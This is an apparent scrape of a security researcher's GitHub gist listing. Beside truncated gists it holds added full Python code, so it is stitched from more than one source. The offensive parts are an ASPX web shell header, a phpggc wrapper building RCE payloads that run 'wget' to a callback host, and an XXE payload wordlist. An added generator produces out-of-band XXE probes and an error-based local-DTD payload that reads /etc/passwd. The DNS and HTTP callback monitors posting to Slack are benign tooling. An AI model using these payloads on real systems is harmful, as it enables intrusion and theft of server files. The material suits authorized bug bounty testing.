
@honoki
honoki / harmless-shell.aspx
Last active Jul 20, 2021
A harmless ASPX shell to demonstrate the impact of arbitrary file upload.
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<!-- sources: https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx -->
<%
Response.Write("Executing code.")
@honoki
honoki / hackerone-update-program-scopes.sh
Last active Aug 12, 2021
Update the scope of your HackerOne programs
#!/bin/bash
# Update the scope of your HackerOne programs
h1name="<your-hackerone-username>"
apitoken="<your-hackerone-api-token>"
next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100'
for p in $(bbrf programs where platform is hackerone --show-empty-scope); do
h1id=$(bbrf show $p | jq -r .tags.h1id)
@honoki
honoki / hackerone-initiate-programs.sh
Last active Sep 25, 2021
Create new BBRF programs from your private and public HackerOne programs.
#!/bin/bash
# Initiate new BBRF programs from your public and private HackerOne programs
h1name="<your-hackerone-username>"
apitoken="<your-hackerone-api-token>"
next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100'
while [ "$next" ]; do
@honoki
honoki / phpggc-generate-payloads.sh
Last active Oct 12, 2021
Automatically generate properly formatted RCE payloads for every gadget chain in phpggc.
#!/bin/bash
# phpggc wrapper that automatically generates payloads for RCE gadgets
function="system"
command="wget http://your.burpcollaborator.net/?"
# modify the options below depending on your use case
options="-a -b -u -f"
# generate gadget chains
@honoki
honoki / xxe-payloads.txt
Last active Sep 25, 2021
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
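The point of the wordlist above is that each payload calls back to its own subdomain (xxe-doctype-system, xxe-entity-system, xxe-paramentity-system, ...), so a single DNS or HTTP hit identifies which parser feature fired even when the application returns nothing. The generator below is an added example, not honoki's list: it rebuilds those out-of-band probes for any callback domain you control (oob.example is a placeholder), adds the xsi:noNamespaceSchemaLocation, XInclude and xml-stylesheet vectors that go beyond the lines visible above, and includes one error-based local-DTD probe of the kind dtd-finder produces, assuming the common /usr/share/yelp/dtd/docbookx.dtd with its ISOamso parameter entity exists on the target.

```python
#!/usr/bin/env python3
"""Build an out-of-band XXE probe list keyed by technique, plus a local-DTD probe.

Added example, not honoki's wordlist. oob.example is a placeholder
callback domain; the yelp docbookx.dtd path and ISOamso entity are the
usual local-DTD target from dtd-finder and are assumed to exist on the victim.
"""
DECL = '<?xml version="1.0" encoding="utf-8" standalone="no" ?>'

# {u} is the per-technique callback URL.
OOB_TECHNIQUES = {
    "doctype-system": '<!DOCTYPE x SYSTEM "{u}"><x />',
    "doctype-public": '<!DOCTYPE x PUBLIC "" "{u}"><x />',
    "entity-system": '<!DOCTYPE x [<!ENTITY xxe SYSTEM "{u}">]><x>&xxe;</x>',
    "entity-public": '<!DOCTYPE x [<!ENTITY xxe PUBLIC "" "{u}">]><x>&xxe;</x>',
    "paramentity-system": '<!DOCTYPE x [<!ENTITY % xxe SYSTEM "{u}">%xxe;]><x/>',
    "paramentity-public": '<!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "{u}">%xxe;]><x/>',
    "xsi-schemalocation": ('<x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
                           'xsi:schemaLocation="{u} {u}x.xsd"/>'),
    "xsi-nonamespace": ('<x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
                        'xsi:noNamespaceSchemaLocation="{u}x.xsd"/>'),
    "xinclude": ('<x xmlns:xi="http://www.w3.org/2001/XInclude">'
                 '<xi:include href="{u}" parse="text"/></x>'),
    "stylesheet-pi": '<?xml-stylesheet type="text/xsl" href="{u}"?><x/>',
}


def callback_url(technique, domain):
    return f"http://xxe-{technique}.{domain}/"


def oob_probes(domain):
    """{technique: payload} for every out-of-band technique."""
    return {t: DECL + tmpl.format(u=callback_url(t, domain))
            for t, tmpl in OOB_TECHNIQUES.items()}


def technique_from_host(host, domain):
    """Map a callback hostname seen in DNS/HTTP logs back to its technique."""
    host = host.rstrip(".").lower()
    suffix = "." + domain.lower()
    if host.startswith("xxe-") and host.endswith(suffix):
        return host[len("xxe-"):-len(suffix)]
    return None


def local_dtd_probe(dtd_path="/usr/share/yelp/dtd/docbookx.dtd", entity="ISOamso",
                    target="file:///etc/passwd"):
    """Error-based XXE needing no callback (the local DTD trick).

    The parser loads a DTD already on disk; redefining one of its parameter
    entities injects %file and %eval, and the failing SYSTEM lookup leaks the
    file contents in the parser's error message. &#x25; / &#x26; / &#x27;
    are % / & / ' escaped so they survive inside an entity value.
    """
    return DECL + (
        '<!DOCTYPE x [\n'
        f'<!ENTITY % local_dtd SYSTEM "file://{dtd_path}">\n'
        f"<!ENTITY % {entity} '\n"
        f'<!ENTITY &#x25; file SYSTEM "{target}">\n'
        '<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM '
        "&#x27;file:///nonexistent/&#x25;file;&#x27;>\">\n"
        '&#x25;eval;\n&#x25;error;\n'
        "'>\n%local_dtd;\n]><x/>")


def wordlist(domain):
    """One payload per line, as a fuzzer (ffuf, Burp Intruder) consumes it."""
    lines = list(oob_probes(domain).values())
    lines.append(local_dtd_probe().replace("\n", ""))
    return lines


if __name__ == "__main__":
    print("\n".join(wordlist("oob.example")))
```

technique_from_host is the receiving side of the naming scheme: feed it the qname from your DNS log and it tells you which technique the target's parser honoured, which is what decides whether you pursue a full entity-based read or fall back to the error-based local-DTD route.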
@honoki
honoki / mitmdump-logger.py
Created Jul 14, 2020
mitmdump script to dump incoming HTTP requests to Slack
#!/usr/bin/python3
import requests
def is_blacklisted(domain):
blacklist = open("/path/to/blacklist.txt")
return domain in [w.strip() for w in blacklist.readlines()]
def request(flow):
req = flow.request.method + ' ' + flow.request.path + ' ' + flow.request.http_version + '\n'
@honoki
honoki / dnsmonitor.py
Last active Jul 17, 2021
Monitor bind9 logs and push queries to Slack
import time
import requests
def is_blacklisted(domain):
blacklist = open("blacklist.txt")
return domain in [w.strip() for w in blacklist.readlines()]
# Avoid Slack expanding your links by replacing the last dot.
def escape_domain(domain):
return domain.replace('yourdomain.com', 'yourdomain[.]com')
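The two monitors above (mitmdump-logger.py and dnsmonitor.py) share the same pattern: parse an incoming event, drop anything on a blacklist, defang the hostname so Slack does not unfurl it, and post. The following is an added example of that pipeline for the bind9 side, not honoki's dnsmonitor.py. SAMPLE_LOG holds constructed lines in the default bind9 querylog format; oob.example, BLACKLIST and the webhook URL are placeholders. The same is_blacklisted and escape_domain helpers serve the mitmdump hook, which would pass flow.request.pretty_host through them instead of a log line.

```python
#!/usr/bin/env python3
"""Turn bind9 query-log lines into Slack alerts for an out-of-band callback domain.

Added example, not honoki's dnsmonitor.py. SAMPLE_LOG is constructed;
oob.example, BLACKLIST and the webhook URL are placeholders.
"""
import json
import re
import time
from urllib import request

# client [@0x...] <ip>#<port> (<qname>): query: <name> <class> <type> <flags> (<server>)
QUERY_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#\d+ \([^)]*\): "
    r"query: (?P<name>\S+) (?P<cls>\S+) (?P<type>\S+)")

SAMPLE_LOG = """\
17-Jul-2021 10:02:11.513 client @0x7f3c1c0a5e60 198.51.100.7#41234 (xxe-entity-system.oob.example): query: xxe-entity-system.oob.example IN A +E(0)K (203.0.113.1)
17-Jul-2021 10:02:12.002 client @0x7f3c1c0a5e60 198.51.100.7#41235 (ns1.oob.example): query: ns1.oob.example IN A + (203.0.113.1)
17-Jul-2021 10:02:13.777 client 192.0.2.9#53311 (LaRaVeL_RCE1.phpggc.oob.example): query: LaRaVeL_RCE1.phpggc.oob.example IN AAAA -E(0) (203.0.113.1)
17-Jul-2021 10:02:14.100 zone oob.example/IN: sending notifies (serial 42)
"""

BLACKLIST = {"oob.example", "ns1.oob.example"}   # noise you never want alerted


def is_blacklisted(name, blacklist=BLACKLIST):
    """Case-insensitive (resolvers randomise 0x20 case) and trailing-dot tolerant."""
    return name.rstrip(".").lower() in blacklist


def escape_domain(name):
    """Defang the last dot so Slack does not unfurl the name into a link."""
    head, dot, tld = name.rstrip(".").rpartition(".")
    return f"{head}[.]{tld}" if dot else name


def parse_query(line):
    """Dict with ip/name/cls/type for a query line, None for any other log line."""
    m = QUERY_RE.search(line)
    return m.groupdict() if m else None


def interesting_queries(lines):
    """Parsed queries that survive the blacklist."""
    for line in lines:
        q = parse_query(line)
        if q and not is_blacklisted(q["name"]):
            yield q


def slack_message(q):
    return {"text": f"DNS {q['type']} {escape_domain(q['name'].lower())} from {q['ip']}"}


def post_to_slack(webhook_url, message):
    body = json.dumps(message).encode()
    req = request.Request(webhook_url, data=body,
                          headers={"Content-Type": "application/json"})
    with request.urlopen(req, timeout=10) as resp:
        return resp.status


def follow(path):
    """tail -f: yield lines appended to path (does not survive log rotation)."""
    with open(path) as fh:
        fh.seek(0, 2)
        while True:
            line = fh.readline()
            if line:
                yield line
            else:
                time.sleep(0.5)


if __name__ == "__main__":
    for q in interesting_queries(SAMPLE_LOG.splitlines()):
        print(json.dumps(slack_message(q)))
    # Live: for q in interesting_queries(follow("/var/log/named/query.log")):
    #           post_to_slack("<your-slack-webhook-url>", slack_message(q))
```

Two details the gist's plain `domain in blacklist` check misses: recursive resolvers randomise the case of query names (so the qname in the log is often mixed case) and some log formats carry a trailing dot, so the comparison lowercases and strips before matching. Only the Slack text is lowercased for readability; the original case is kept in the parsed record.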